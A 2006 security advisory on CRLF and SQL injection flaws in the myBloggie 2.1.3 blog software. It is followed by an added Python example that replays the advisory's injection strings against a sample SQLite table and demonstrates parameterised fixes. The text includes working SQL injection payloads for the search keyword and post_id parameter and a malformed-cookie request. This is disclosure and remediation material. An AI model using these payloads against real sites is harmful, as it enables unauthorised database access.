HYSA-2006-008.txt

Published: 22 May 2006 00:00:00 | Reported by: matrix killer | Type: packetstorm | Source: packetstormsecurity.com

myBloggie 2.1.3 CRLF & SQL Injection, Medium severity, vendor unresponsive

------------------------------------------------------  
HYSA-2006-008 h4cky0u.org Advisory 017  
------------------------------------------------------  
Date - Wed May 17 2006  
  
  
TITLE:  
======  
  
myBloggie 2.1.3 CRLF & SQL Injection   
  
  
SEVERITY:   
=========   
  
Medium   
  
  
SOFTWARE:   
=========   
  
myBloggie 2.1.3   
  
http://mybloggie.mywebland.com/   
  
  
INFO:   
=====   
  
myBloggie is described by its vendor as one of the simplest and most user-friendly, yet feature-packed,   
  
weblog systems available to date.   
  
  
DESCRIPTION:   
============   
  
--==CRLF injection==--   
  
The request below, carrying a malformed PHPSESSID cookie (the value op0-11{}};q, or something similar), was sent to /mybloggie/, /mybloggie/admin.php and /mybloggie/index.php; only the request line differs between the three. Note that the proof of concept as published contains no literal CR/LF sequence, so the exact header-injection vector is not shown.   
  
GET /mybloggie/ HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q   
Connection: Close   
  
--==SQL injection==--   
  
http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id='   
  
A bare single quote in post_id is enough to break the query, which shows that the value reaches the SQL statement unescaped.   
  
MurderSkillz also discovered a bug in the search function. Either of the following, submitted as the search keyword, is a proof of concept:   
  
1' having '1'='1'--   
  
or   
  
' or 'x'='x--   
  
And a little patch from me (rewritten here to run on current PHP: ereg() was removed in PHP 7, so the check uses preg_match(), and the isset() tests are moved ahead of the character check so an empty search no longer raises a notice):   
  
$select  = isset($_GET['select'])   ? $_GET['select']   : '';   
$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';   
  
// Allow-list: anything outside [A-Za-z0-9_] is refused before it can reach the query.   
if (preg_match('/[^A-Za-z0-9_]/', $keyword)) {   
    echo "Invalid Characters";   
    exit;   
}   
  
// $html_entities_match / $html_entities_replace are myBloggie's own globals.   
$keyword = preg_replace($html_entities_match, $html_entities_replace, $keyword);   
//....   
  
Note that this allow-list also rejects spaces, so multi-word searches stop working; escaping the value, or binding it as a query parameter, at the point where the SQL is built avoids that side effect.   
  
  
VENDOR STATUS:   
==============   
  
The vendor was contacted but no response has been received to date.   
  
  
CREDITS:   
========   
  
This vulnerability was discovered and researched by   
matrix_killer of h4cky0u Security Forums.   
  
mail : matrix_k at abv.bg   
  
web : http://www.h4cky0u.org   
  
  
Search function sql injection was discovered by: MurderSkillz  
  
  
Co-Researcher:  
  
h4cky0u of h4cky0u Security Forums.   
  
mail : h4cky0u at gmail.com   
  
web : http://www.h4cky0u.org   
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
  
ORIGINAL ADVISORY:  
==================  
  
http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt  
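The following is an added, runnable example; it is not part of the advisory and not myBloggie code. It replays the advisory's two proof-of-concept inputs (`' or 'x'='x--` as the search keyword, and a bare `'` as post_id) against a constructed SQLite table standing in for myBloggie's MySQL posts table (the table and column names are assumptions), then shows the parameterised query and integer check that close both holes, and transliterates the advisory's allow-list patch to show why it also breaks multi-word searches.

```python
"""Added example, not from the advisory or from myBloggie: replay the
advisory's injection strings against a throwaway SQLite table, then show
the fixes. Table and column names are assumptions."""
import re
import sqlite3

# Constructed sample data standing in for the blog's posts table.
POSTS = [
    (1, "hello world", 0),
    (2, "second post", 0),
    (3, "draft: unpublished", 1),   # is_secret = 1: must never be searchable
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (post_id INTEGER PRIMARY KEY, title TEXT, is_secret INTEGER)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", POSTS)
    return conn


def search_vulnerable(conn, keyword):
    """Search built by string concatenation, the pattern the advisory's patch works around.
    With the PoC keyword the leading quote closes the LIKE literal early and the WHERE
    clause becomes  title LIKE '%' OR ...  which is true for every row, secret ones included."""
    sql = ("SELECT post_id FROM posts WHERE title LIKE '%" + keyword
           + "%' AND is_secret = 0 ORDER BY post_id")
    return [row[0] for row in conn.execute(sql)]


def view_vulnerable(conn, post_id):
    """viewid handler that splices post_id straight into the query."""
    sql = "SELECT title FROM posts WHERE post_id = '" + post_id + "' ORDER BY post_id"
    return [row[0] for row in conn.execute(sql)]


def breaks_query(conn, post_id):
    """True when a post_id value makes view_vulnerable() fail with a database error,
    which is exactly what index.php?mode=viewid&post_id=' reveals about the original."""
    try:
        view_vulnerable(conn, post_id)
        return False
    except sqlite3.Error:
        return True


def keyword_allowed(keyword):
    """The advisory's allow-list patch, transliterated from ereg() to re:
    any character outside [A-Za-z0-9_] is rejected (spaces included)."""
    return re.search(r"[^A-Za-z0-9_]", keyword) is None


def search_safe(conn, keyword):
    """Fixed search: the keyword is bound as a parameter, so quotes are data, and a
    multi-word keyword still works. LIKE wildcards (% and _) inside the keyword still
    act as wildcards; that is a separate, non-injection concern."""
    rows = conn.execute(
        "SELECT post_id FROM posts WHERE title LIKE ? AND is_secret = 0 ORDER BY post_id",
        ("%" + keyword + "%",))
    return [row[0] for row in rows]


def view_safe(conn, post_id):
    """Fixed viewid handler: post_id must be a decimal integer; anything else is
    rejected (None) before the database is touched."""
    if not re.fullmatch(r"[0-9]+", post_id):
        return None
    rows = conn.execute("SELECT title FROM posts WHERE post_id = ?", (int(post_id),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("search PoC  :", search_vulnerable(db, "' or 'x'='x--"))   # every row, secret too
    print("search fixed:", search_safe(db, "' or 'x'='x--"))         # nothing matches
    print("viewid PoC  :", breaks_query(db, "'"))                    # True: SQL error
    print("viewid fixed:", view_safe(db, "'"))                       # None: rejected
```

Run it directly to print the four outcomes. The mechanics on a PHP/MySQL stack are the same: the quote closes the string literal and the rest of the input becomes SQL, which is why binding the value (or, for post_id, casting to an integer) fixes the problem where the advisory's character allow-list only narrows it.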
